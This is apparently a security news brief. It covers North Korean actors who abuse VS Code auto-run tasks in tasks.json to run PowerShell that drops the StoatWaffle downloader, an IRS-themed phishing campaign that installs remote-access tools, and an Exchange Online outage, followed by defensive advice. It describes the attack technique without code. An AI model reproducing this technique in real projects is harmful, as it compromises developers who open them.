North Korean Hackers Abuse VS Code Auto-Run Tasks to

What Happened

Microsoft has been contending with multiple, unrelated security incidents. A service change to Exchange Online caused intermittent access issues for Outlook users on mobile and Mac platforms, which the company is actively resolving. Concurrently, security researchers have identified a sophisticated campaign attributed to the North Korean threat actor group WaterPlum (also tracked as Contagious Interview). This group is distributing a malware family known as StoatWaffle by weaponizing legitimate features within Microsoft’s Visual Studio Code editor. In a separate, widespread campaign, Microsoft has warned of IRS-themed phishing emails that have already targeted approximately 29,000 users, aiming to steal credentials and deploy remote monitoring and management (RMM) malware.

Why It Matters

These incidents highlight a dual threat landscape: sophisticated nation-state espionage and high-volume, financially motivated cybercrime. The WaterPlum campaign demonstrates advanced persistent threats (APTs) are increasingly abusing trusted developer tools to bypass security controls, posing a significant risk to software development and IT environments. The massive IRS phishing wave exploits human psychology during tax season, threatening both individual and corporate financial security. The unrelated Exchange Online service issue, while not malicious, underscores the critical dependency organizations have on cloud email services and the operational impact of service disruptions.

Technical Details

The North Korean actors are distributing malicious Visual Studio Code configuration files (.vscode/tasks.json) that abuse the editor’s legitimate “auto-run tasks” feature. When a developer opens a compromised project, the task automatically executes a PowerShell script, leading to the deployment of the StoatWaffle malware. StoatWaffle is a downloader capable of fetching and executing additional payloads, facilitating further compromise. The IRS campaign uses convincing email lures with tax-related urgency to trick recipients into opening attachments or links. Successful phishing leads to credential harvesting or the installation of RMM tools like AnyDesk and ScreenConnect, which attackers use for persistent remote access.

Immediate Risk

The risk from the WaterPlum campaign is MEDIUM. It is a targeted attack likely aimed at specific organizations for espionage purposes, rather than a broad, indiscriminate threat. However, any organization using VS Code, particularly in sectors of interest to North Korea (e.g., defense, technology, finance), could be at risk. The IRS phishing campaign presents a HIGH volume risk to the general public and employees, with a high probability of successful credential theft or initial access leading to ransomware or data theft. The Exchange Online issue is an operational nuisance with no direct security risk, but it could be exploited in social engineering attacks.

Security Insight

Security teams should treat developer environments as critical infrastructure. Implement application allowlisting to control which scripts and binaries can execute, and monitor for unusual PowerShell activity originating from code editors. For the phishing threat, reinforce user training on tax-season scams and implement strong email filtering rules for IRS-themed emails. Multi-factor authentication (MFA) is critical to mitigate the impact of stolen credentials. While these threats are not linked to specific CVEs like the recent Microsoft Bing Images Command Injection (CVE-2026-32194) or Himmelblau Authentication Bypass (CVE-2026-31957), they emphasize that threat actors will exploit any available vector, from software features to human trust.